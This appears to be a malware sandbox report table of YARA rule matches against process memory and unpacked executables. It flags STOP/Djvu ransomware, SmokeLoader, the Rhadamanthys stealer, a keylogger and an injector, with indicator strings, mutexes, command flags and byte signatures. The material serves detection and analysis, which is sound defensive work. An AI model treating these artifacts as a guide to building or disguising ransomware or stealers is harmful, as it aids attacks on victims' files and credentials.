0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000B.00000002.375648108.00000000007A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000002.427822773.00000000005D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Process Memory Space: 1128.exe PID: 4608	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 1128.exe PID: 4608	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: rundll32.exe PID: 5500	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: rundll32.exe PID: 5500	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rundll32.exe PID: 5500	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: A4A.exe PID: 1332	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: A4A.exe PID: 1332	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4bd01:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: A4A.exe PID: 2208	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: A4A.exe PID: 2208	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x55c2d:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: ECAC.exe PID: 6092	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: ECAC.exe PID: 6092	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x310bd:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: DC3D.exe PID: 3344	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: DC3D.exe PID: 3344	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4336e:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 67 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
27.2.DC3D.exe.22d15a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
27.2.DC3D.exe.22d15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
27.2.DC3D.exe.22d15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
27.2.DC3D.exe.22d15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
18.2.A4A.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
18.2.A4A.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
18.2.A4A.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
18.2.A4A.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
13.2.A4A.exe.23e15a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
13.2.A4A.exe.23e15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.A4A.exe.23e15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
13.2.A4A.exe.23e15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.ECAC.exe.23d15a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
25.2.ECAC.exe.23d15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.ECAC.exe.23d15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.ECAC.exe.23d15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
31.2.DC3D.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
31.2.DC3D.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
31.2.DC3D.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
31.2.DC3D.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
12.3.rundll32.exe.156f1980000.45.unpack	SUSP_ENV_Folder_Root_File_Jan23_1	Detects suspicious file path pointing to the root of a folder easily accessible via environment variables	Florian Roth (Nextron Systems)	0x158094:$xr1: %AppData%\com.liber
18.2.A4A.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
18.2.A4A.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
18.2.A4A.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
18.2.A4A.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
31.2.DC3D.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
31.2.DC3D.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
31.2.DC3D.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
31.2.DC3D.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
29.2.ECAC.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
29.2.ECAC.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
29.2.ECAC.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
29.2.ECAC.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.0.42FE.exe.340000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x3a4a57:$s1: Runner 0x3a4bbc:$s3: RunOnStartup 0x3a4a6b:$a1: Antis 0x3a4a98:$a2: antiVM 0x3a4a9f:$a3: antiSandbox 0x3a4aab:$a4: antiDebug 0x3a4ab5:$a5: antiEmulator 0x3a4ac2:$a6: enablePersistence 0x3a4ad4:$a7: enableFakeError 0x3a4be5:$a8: DetectVirtualMachine 0x3a4c0a:$a9: DetectSandboxie 0x3a4c35:$a10: DetectDebugger 0x3a4c44:$a11: CheckEmulator
13.2.A4A.exe.23e15a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
13.2.A4A.exe.23e15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.A4A.exe.23e15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
13.2.A4A.exe.23e15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
12.3.rundll32.exe.156f18d0000.13.unpack	SUSP_ENV_Folder_Root_File_Jan23_1	Detects suspicious file path pointing to the root of a folder easily accessible via environment variables	Florian Roth (Nextron Systems)	0x20fe94:$xr1: %AppData%\com.liber
29.2.ECAC.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
29.2.ECAC.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
29.2.ECAC.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
29.2.ECAC.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
27.2.DC3D.exe.22d15a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
27.2.DC3D.exe.22d15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
